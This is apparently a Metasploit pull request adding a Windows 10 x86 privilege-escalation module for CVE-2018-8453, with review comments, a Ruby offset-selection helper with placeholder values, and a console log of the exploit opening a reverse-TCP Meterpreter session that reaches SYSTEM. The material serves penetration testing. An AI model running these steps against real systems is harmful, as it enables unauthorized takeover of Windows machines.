
Add module for cve-2018-8453 #12011

Merged (1 commit), Jul 15, 2019
Conversation

jrobles-r7
Contributor

@jrobles-r7 jrobles-r7 commented Jun 25, 2019

Add a local Windows privilege escalation module for CVE-2018-8453.
The PoC code is from the x86 version of https://github.com/ze0r/cve-2018-8453-exp
The author has given permission to use their code in msf as well.

Verification

List the steps needed to make sure this thing works

  • Get a non-SYSTEM meterpreter session on Win10 v1703 x86
  • use exploit/windows/local/cve_2018_8453_win32k_priv_esc
  • set session <session>
  • exploit
  • Get a SYSTEM session

@wchen-r7 wchen-r7 self-assigned this Jun 25, 2019
@wvu wvu removed the tests label Jun 26, 2019
@wvu
Contributor

wvu commented Jun 26, 2019

Removed tests label. Reapply if I was wrong. Thanks.

@wvu wvu added the docs label Jun 26, 2019
Contributor

@wvu wvu left a comment


Another clean submission. Very nice. Only a couple questions but otherwise no changes required.

@wchen-r7
Contributor

So Jacob and I had a little discussion about this pull request, and I requested at least these changes:

  • The exploit binary needs to be compiled with /MT for the runtime library setting.
  • The offsets are rather specific to build 15063 on Win 10. We want to allow that to be more configurable for the user, and also ship with pre-configured ones to cover common builds (for example, images downloadable from MSDN).

After that, as long as the exploit works, I can take over the rest and land this.
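The build-keyed offset selection requested above, as an added example that is not code from the Metasploit module, from this PR, or from ze0r's PoC. It parses the OS string and architecture in the shape Meterpreter's sysinfo reports them (assumed format, e.g. "Windows 10 (10.0 Build 15063)."), picks an offset set for that build from a table that the user can extend, and refuses to proceed on any build or architecture without an entry. The offset values in the table are placeholders, not real win32k or kernel offsets, and the sample session data is constructed.

```ruby
# Added example: pre-flight target check with a per-build offset table.
# The offsets here are PLACEHOLDERS, not the real values used by the module.

# Assumed shape of Meterpreter's sysinfo['OS'], e.g. "Windows 10 (10.0 Build 15063)."
# or "Windows 7 (6.1 Build 7601, Service Pack 1)."
OS_RE = /\AWindows\s+(?<product>[^(]+?)\s*\((?<major>\d+)\.(?<minor>\d+)\s+Build\s+(?<build>\d+)[^)]*\)/

# Hypothetical offset table keyed by build number. Each entry records the
# architecture it was derived for; the numeric values are placeholders.
OFFSETS = {
  15063 => { arch: 'x86', eprocess_token: 0x0, eprocess_uniqueprocessid: 0x0 }, # placeholders
}.freeze

# Constructed sample sessions (not captured from a real target).
SAMPLE_SESSIONS = {
  supported:   { 'OS' => 'Windows 10 (10.0 Build 15063).', 'Architecture' => 'x86' },
  wrong_arch:  { 'OS' => 'Windows 10 (10.0 Build 15063).', 'Architecture' => 'x64' },
  other_build: { 'OS' => 'Windows 10 (10.0 Build 17763).', 'Architecture' => 'x86' },
  not_win10:   { 'OS' => 'Windows 7 (6.1 Build 7601, Service Pack 1).', 'Architecture' => 'x86' },
}.freeze

ParsedOs = Struct.new(:product, :major, :minor, :build, keyword_init: true)

# Returns a ParsedOs, or nil when the string does not have the expected shape.
def parse_os(os_string)
  m = OS_RE.match(os_string.to_s)
  return nil unless m
  ParsedOs.new(product: m[:product].strip, major: m[:major].to_i,
               minor: m[:minor].to_i, build: m[:build].to_i)
end

# Mirrors the shape of a module check: returns [:appears, offsets] when the
# reported build and architecture have a known offset set, [:safe, reason]
# when they do not, and [:unknown, reason] when the OS string is unparseable.
# A user-supplied table (e.g. built from a module option) can be passed in to
# cover builds the shipped table does not know about.
#
# Caveat: a patched machine reports the same build number, so :appears means
# "an offset set exists for this build", not "the target is vulnerable".
def select_offsets(sysinfo, table = OFFSETS)
  os = parse_os(sysinfo['OS'])
  return [:unknown, 'could not parse OS string'] unless os
  return [:safe, "not Windows 10 (reported #{os.major}.#{os.minor})"] unless os.major == 10

  entry = table[os.build]
  return [:safe, "no offsets for build #{os.build}"] unless entry

  arch = sysinfo['Architecture'].to_s
  return [:safe, "offsets are for #{entry[:arch]}, session is #{arch}"] unless arch == entry[:arch]

  [:appears, entry]
end

if $PROGRAM_NAME == __FILE__
  SAMPLE_SESSIONS.each do |name, info|
    code, detail = select_offsets(info)
    puts format('%-12s %-8s %s', name, code, code == :appears ? 'offsets selected' : detail)
  end
end
```

To add a build, merge an entry into the table rather than editing the check: `select_offsets(info, OFFSETS.merge(17763 => { arch: 'x86', ... }))`. The revision (UBR) that would distinguish a patched 15063 from an unpatched one is not in the OS string, so a real module still needs a separate vulnerability check before firing the exploit.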

@wchen-r7
Contributor

It works!

msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > show options

Module options (exploit/windows/local/cve_2018_8453_win32k_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.138.1     yes       The listen address (an interface may be specified)
   LPORT     5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 10 v1703 (Build 15063) x86


msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > run

[*] Started reverse TCP handler on 172.16.138.1:5555 
[+] Exploit finished, wait for privileged payload execution to complete.
[*] Sending stage (179779 bytes) to 172.16.138.129
[*] Meterpreter session 2 opened (172.16.138.1:5555 -> 172.16.138.129:49674) at 2019-07-15 02:35:24 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

@wchen-r7
Contributor

A few minor changes here and there and then I should be able to land it. Thanks for waiting!

@wchen-r7 wchen-r7 merged commit a55aea3 into rapid7:master Jul 15, 2019
wchen-r7 added a commit that referenced this pull request Jul 15, 2019
@wchen-r7
Contributor

wchen-r7 commented Jul 15, 2019

Release Notes

A module for CVE-2018-8453 has been added to the framework. It is a local Windows privilege escalation module that works for x86 Windows 10 build 15063.

msjenkins-r7 pushed a commit that referenced this pull request Jul 15, 2019
@jrobles-r7 jrobles-r7 deleted the feature/cve-2018-8453 branch July 22, 2019 14:44
@tdoan-r7 tdoan-r7 added the rn-modules release notes for new or majorly enhanced modules label Jul 23, 2019